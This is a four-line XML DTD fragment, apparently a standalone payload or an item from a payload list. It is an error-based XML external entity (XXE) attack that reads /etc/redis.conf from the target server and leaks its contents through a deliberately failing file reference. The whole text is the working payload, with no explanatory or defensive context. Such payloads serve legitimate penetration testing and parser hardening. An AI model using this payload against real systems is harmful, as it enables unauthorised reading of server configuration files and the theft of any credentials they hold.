<!ENTITY % file SYSTEM "file:///etc/redis.conf">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
